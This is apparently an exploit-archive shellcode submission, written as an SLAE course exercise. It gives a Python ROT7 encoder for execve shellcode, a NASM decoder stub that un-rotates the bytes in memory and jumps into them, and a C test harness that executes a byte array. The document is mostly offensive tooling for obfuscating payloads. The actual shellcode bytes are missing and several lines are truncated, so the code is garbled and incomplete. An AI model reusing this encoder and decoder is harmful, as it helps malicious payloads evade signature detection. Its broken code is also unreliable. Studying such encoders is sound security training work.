# Shellcode Title: ROT7
# Date: 5 July 2015
# Exploit Author: Artem Tsvetkov
# Software Link:
# Tested on: Kali GNU/Linux 1.1.0
# Platform: x86 Linux
This code was created as an exercise for the SecurityTube Linux Assembly
Expert (SLAE).
The following will produce rot7-encoded shellcode using a custom scheme to
dynamically set the shellcode length. The length is used by the decoder to
determine when it should stop decoding.
# Python ROT-7 Encoder
# execve 24 bytes
shellcode = (
# byte[0] == shellcode length
encoded = "\\x%02x," % len(bytearray(shellcode))
encoded2 = "0x%02x," % len(bytearray(shellcode))
print 'Encoded shellcode ...'
for x in bytearray(shellcode) :
# boundary is computed as 255-ROT(x) where x, the amount to rotate by
if x > 248:
encoded += '\\x'
encoded += '%02x' %(7 -(256 - x))
encoded2 += '0x'
encoded2 += '%02x,' %(7 -(256 - x))
encoded += '\\x'
encoded += '%02x'%(x+7)
encoded2 += '0x'
encoded2 += '%02x,' %(x+7)
print '\n%s\n\n%s\n\nShellcode Length: %d\n' % (encoded, encoded2,
The following is the NASM decoder:
; ROT7 NASM decoder
global _start
section .text
jmp short stage
pop esi ; shellcode address
mov al, byte [esi] ; shellcode length
xor ecx, ecx ; position
mov bl, byte [esi+ecx+1] ; get rot'ed byted
sub bl, 0x7 ; rot it back (-7)
mov byte [esi+ecx], bl ; store it in shellcode
inc ecx ; next position
cmp al, cl ; check if reached the end of shellcode
jnz short decode ; if not, continue derot'ing
jmp shellcode ; else, execute derot'ed shellcode
call decoder
; Shellcode Format:
; byte[0] = length of shellcode (max 0xff)
; byte[1..] = rot'ed shellcode
shellcode: db
* Sample run
* Compile with: gcc rot7.c -o rot7
unsigned char code[] = \
int main()
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;